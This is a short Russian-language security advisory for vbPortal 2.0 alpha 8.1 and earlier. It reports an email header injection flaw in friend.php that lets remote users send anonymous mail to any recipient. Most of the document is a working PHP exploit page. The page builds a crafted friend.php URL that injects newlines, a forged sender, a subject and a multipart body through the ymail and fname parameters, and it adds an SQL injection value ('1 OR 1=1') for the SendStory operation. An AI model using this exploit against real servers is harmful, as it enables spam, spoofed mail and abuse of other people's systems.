Программа: vbPortal 2.0 alpha 8.1 и более ранние версии 

Уязвимость обнаружена в vbPortal. Удаленный пользователь может послать анонимное почтовое сообщение через целевую систему.
Удаленный пользователь может использовать функции SendStory() и SendSite() в 'friend.php' сценарии, чтобы послать произвольное почтовое сообщение произвольному адресату. Удаленный пользователь может определить yname и ymail переменные, чтобы внедрить произвольные e-mail заголовки. 

Пример: 

<?
if (!isset($Send)){
?>

<form action="<? echo $PHP_SELF; ?>">
URL : <input type="text" name="url"><br>
From : <input type="text" name="from"><br>
Your Name : <input type="text" name="yname"><br>
To : <input type="text" name="fmail"><br>
Content Type : <input type="text" name="contenttype"
value="text/plain"><br>
Subject To Add : <input type="text" name="newsubject"><br>
Op. : <br>
<input type="radio" checked name="op"
value="SendSite">SendSite<br>
<input type="radio" name="op" value="SendStory">SendStory<br>
Message : <br><br><textarea name="message" rows="6"
cols="50"></textarea>
<br><br><input type="submit" name="Send" value="Verify">
</form>

<?
}else{

echo "URL : ".$url."<br>";
echo "From: ".$from."<br>";
echo "Your Name: ".$yname."<br>";
echo "To: ".$fmail."<br>";
echo "Content Type: ".$contenttype."<br>";
echo "Added Subject: ".$newsubject."<br>";
echo "Message :
<br><br>".str_replace("\n","<br>",$message);

if ($op=="SendStory"){ $sid="1%20OR%201=1"; }

$ymail=$from.">%0A";
$ymail.="Subject:".$newsubject."%0A";
$ymail.="Content-Type:multipart/mixed;%20boundary=Anonymous;";
$ymail.="%0A%0A%0A";
$fname="%0A--Anonymous%0A";
$fname.="Content-Type:".$contenttype."%0A%0A";
$fname.=str_replace("\n","%0A",$message);
$fname.="%0A%0A%0A";
$fname.="--Anonymous--";
$fname.="%0A%0A%0A";

$url.="/friend.php?sid=".$sid."&op=".$op."&yname=".$yname."&ymail=".$ymail
."
&fmail=".$fmail."&fname=".$fname;

echo "<br><br><b><a href=\"$url\">Ok, Mail
It</a></b>";
?>

Оставить мнение